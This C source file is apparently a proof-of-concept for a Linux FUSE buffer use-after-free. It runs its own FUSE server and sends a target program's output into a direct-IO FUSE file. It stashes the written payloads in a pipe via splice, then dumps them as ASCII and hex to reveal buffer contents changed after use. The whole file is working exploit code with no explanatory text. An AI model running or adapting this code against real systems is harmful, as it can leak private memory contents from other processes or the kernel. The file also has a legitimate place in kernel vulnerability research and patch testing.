#define _GNU_SOURCE
#include <err.h>
#include <stdio.h>
#include <errno.h>
#include <inttypes.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <unistd.h>
#include <string.h>
#include <sys/eventfd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <linux/fuse.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void write_file(char *name, char *buf) {
  int fd = SYSCHK(open(name, O_WRONLY));
  if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "write %s", name);
  close(fd);
}

static void write_map(char *name, int outer_id) {
  char buf[100];
  sprintf(buf, "0 %d 1", outer_id);
  write_file(name, buf);
}

static int fuse_fd;

void *xmalloc(size_t s) {
  void *obj = malloc(s);
  if (s != 0 && obj == NULL)
    err(1, "malloc");
  return obj;
}

void *xreallocarray(void *ptr, size_t nmemb, size_t size) {
  void *ret = reallocarray(ptr, nmemb, size);
  if (ret == NULL && nmemb != 0 && size != 0)
    err(1, "reallocarray");
  return ret;
}

int *write_lens = NULL;
size_t write_lens_count = 0;
size_t write_lens_total = 0;
int uaf_stash_pipe[2];

void dump_all_bufs() {
  int copy_pipe[2];
  SYSCHK(pipe2(copy_pipe, O_NONBLOCK));
  if (fcntl(copy_pipe[0], F_SETPIPE_SZ, 0x1000 * 256) != 0x1000 * 256)
    err(1, "F_SETPIPE_SZ");
  if (SYSCHK(tee(uaf_stash_pipe[0], copy_pipe[1], write_lens_total, SPLICE_F_NONBLOCK)) != write_lens_total)
    errx(1, "tee() didn't get as much data as expected");
  char *uaf_stash_data = xmalloc(write_lens_total);
  if (SYSCHK(read(copy_pipe[0], uaf_stash_data, write_lens_total)) != write_lens_total)
    errx(1, "read() from copied pipe got less than expected");
  close(copy_pipe[0]);
  close(copy_pipe[1]);

  printf("\n================================ dumping all buffers (as ascii and hex) ========================================\n");

  size_t stash_off = 0;
  for (int i=0; i<write_lens_count; i++) {
    int len = write_lens[i];
    printf("[write %d]: <<<", i);

    char *data = uaf_stash_data + stash_off;
    stash_off += len;

    for (int off=0; off<len; off++) {
      char c = data[off];
      if (c >= 0x20 && c <= 0x7e)
        putchar(c);
      else
        putchar('.');
    }
    printf(">>> =");
    for (int off=0; off<len; off++) {
      unsigned char c = (unsigned char)data[off];
      unsigned char high = c >> 4;
      unsigned char low = c & 0xf;
      putchar(' ');
      putchar(high >= 10 ? (high-10+'a') : (high+'0'));
      putchar(low >= 10 ? (low-10+'a') : (low+'0'));
    }

    putchar('\n');
  }
}

int main(int argc, char **argv) {
  sync();
  //setbuf(stdout, NULL);
  //setbuf(stderr, NULL);

  int trigger_fd = SYSCHK(eventfd(0, 0));

  char tmp_path[] = "/tmp/fuse-buffer-uaf.XXXXXX";
  if (mkdtemp(tmp_path) == NULL)
    err(1, "mkdtemp");

  pid_t parent = getpid();
  pid_t child = SYSCHK(fork()/*syscall(__NR_clone, CLONE_FILES|SIGCHLD, NULL, NULL, NULL, NULL)*/);
  if (child == 0) {
    char debug_val[0x1f000];
    memset(debug_val, 'A', sizeof(debug_val));
    debug_val[sizeof(debug_val)-1] = '\0';
    setenv("LD_DEBUG", debug_val, 1);
    eventfd_t value;
    SYSCHK(eventfd_read(trigger_fd, &value));
    char fusepath[100];
    sprintf(fusepath, "%s/a", tmp_path);
    int fuse_fd = SYSCHK(open(fusepath, O_RDWR));
    /*
    char lazy_umount_cmd[1000];
    sprintf(lazy_umount_cmd, "fusermount -z %s", tmp_path);
    system(lazy_umount_cmd);
    */
    SYSCHK(dup2(fuse_fd, 1));
    SYSCHK(dup2(fuse_fd, 2));
    execvp(argv[1], argv+1);
    err(1, "execvp");
  }

  int commfds[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, commfds));
  char commfd_str[100];
  sprintf(commfd_str, "%d", commfds[1]);
  setenv("_FUSE_COMMFD", commfd_str, 1);

  pid_t fusermount_pid = SYSCHK(fork());
  if (fusermount_pid == 0) {
    close(commfds[0]);
    char mount_cmd[4096];
    execlp("fusermount", "fusermount", "-o", "auto_unmount", tmp_path, NULL);
    err(1, "exec fusermount");
  }
  close(commfds[1]);

  char msgbuf[100];
  struct iovec msg_iov = { .iov_base = msgbuf, .iov_len = sizeof(msgbuf) };
  char msg_control[100];
  struct msghdr msg = {
    .msg_iov = &msg_iov,
    .msg_iovlen = 1,
    .msg_control = msg_control,
    .msg_controllen = sizeof(msg_control)
  };
  int recv_len = SYSCHK(recvmsg(commfds[0], &msg, 0));
  if (msg.msg_controllen != CMSG_SPACE(sizeof(int)))
    errx(1, "unexpected out cmsg size");
  struct cmsghdr *cmsg = (void*)msg_control;
  if (cmsg->cmsg_len != CMSG_LEN(sizeof(int)) || cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS)
    errx(1, "unexpected out cmsg");
  fuse_fd = *(int*)CMSG_DATA(cmsg);
  printf("got fuse FD %d\n", fuse_fd);
  SYSCHK(eventfd_write(trigger_fd, 1));

  SYSCHK(pipe2(uaf_stash_pipe, O_NONBLOCK));
  if (fcntl(uaf_stash_pipe[0], F_SETPIPE_SZ, 0x1000 * 256) != 0x1000 * 256)
    err(1, "F_SETPIPE_SZ (stash)");

  while (1) {
    int pfds[2];
    SYSCHK(pipe2(pfds, O_NONBLOCK));
    if (fcntl(pfds[0], F_SETPIPE_SZ, 0x10000) != 0x10000)
      err(1, "F_SETPIPE_SZ");

    int reqsize = SYSCHK(splice(fuse_fd, NULL, pfds[1], NULL, 0x10000, 0));
    //printf("spliced %d bytes request\n", reqsize);

#define READ(_obj) if (read(pfds[0], &(_obj), sizeof(_obj)) != sizeof(_obj)) err(1, "failed to read " #_obj)
#define WRITE(_obj) if (write(fuse_fd, &(_obj), sizeof(_obj)) != sizeof(_obj)) err(1, "failed to write " #_obj)

    struct fuse_in_header inh;
    READ(inh);
    int len = inh.len - sizeof(inh);
    /*
    printf("got request: len=%u opcode=%u unique=%"PRIu64" nodeid=%"PRIu64" len_after_inh=%d\n",
           inh.len, inh.opcode, inh.unique, inh.nodeid, len);
           */
    if (inh.len != reqsize)
      errx(1, "bogus inh.len???");
    if (inh.opcode == FUSE_INIT/* && len >= sizeof(struct fuse_init_out)*/) {
      struct {
        unsigned major;
        unsigned minor;
        unsigned max_readahead;
        unsigned flags;
      } init_out;
      READ(init_out);
      printf("init: major=%u minor=%u max_readahead=%u flags=0x%x\n",
          init_out.major, init_out.minor, init_out.max_readahead, init_out.flags);
      struct {
        struct fuse_out_header h;
        struct fuse_init_in b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = inh.unique },
        .b = { .major = init_out.major, .minor = init_out.minor, .max_readahead = 0, .flags = 0 }
      };
      WRITE(reply);
    } else if (inh.opcode == FUSE_LOOKUP) {
      char buf[len];
      READ(buf);
      //printf("lookup '%s'\n", buf);
      int nid = 9;
      if (buf[0] == 'a') nid = 2;
      if (buf[0] == 'b') nid = 3;
      struct {
        struct fuse_out_header h;
        struct fuse_entry_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = inh.unique },
        .b = { .nodeid = nid, .attr = { .ino = 123, .size = 4096, .mode = S_IFREG|0666, .nlink = 1 } }
      };
      WRITE(reply);
    } else if (inh.opcode == FUSE_OPEN && len == sizeof(struct fuse_open_in)) {
      struct fuse_open_in open_in;
      READ(open_in);
      printf("open\n");
      struct {
        struct fuse_out_header h;
        struct fuse_open_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = inh.unique },
        .b = { .open_flags = (inh.nodeid == 2) ? FOPEN_DIRECT_IO : 0 }
      };
      WRITE(reply);
    } else if (inh.opcode == FUSE_WRITE && len >= sizeof(struct fuse_write_in)) {
      struct fuse_write_in write_in;
      READ(write_in);
      int payload_len = len - sizeof(struct fuse_write_in);
      printf("write %d\n", payload_len);
      struct {
        struct fuse_out_header h;
        struct fuse_write_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = inh.unique },
        .b = { .size = payload_len }
      };
      WRITE(reply);

      /* stash the payload */
      if (splice(pfds[0], NULL, uaf_stash_pipe[1], NULL, payload_len, SPLICE_F_NONBLOCK) != payload_len)
        err(1, "splice (stash)");
      write_lens_count++;
      write_lens = xreallocarray(write_lens, write_lens_count, sizeof(*write_lens));
      write_lens[write_lens_count-1] = payload_len;
      write_lens_total += payload_len;

      dump_all_bufs();
    } else if (inh.opcode == FUSE_GETXATTR || inh.opcode == FUSE_GETATTR || inh.opcode == FUSE_FLUSH || inh.opcode == FUSE_ACCESS) {
      struct fuse_out_header out_err = { .len = sizeof(out_err), .error = -ENOSYS, .unique = inh.unique };
      WRITE(out_err);
    } else if (inh.opcode == FUSE_RELEASE) {
      printf("got FUSE_RELEASE\n");
      dump_all_bufs();
      exit(0);
    } else {
      errx(1, "unhandled opcode %u", inh.opcode);
    }
    close(pfds[0]);
    close(pfds[1]);
  }
}

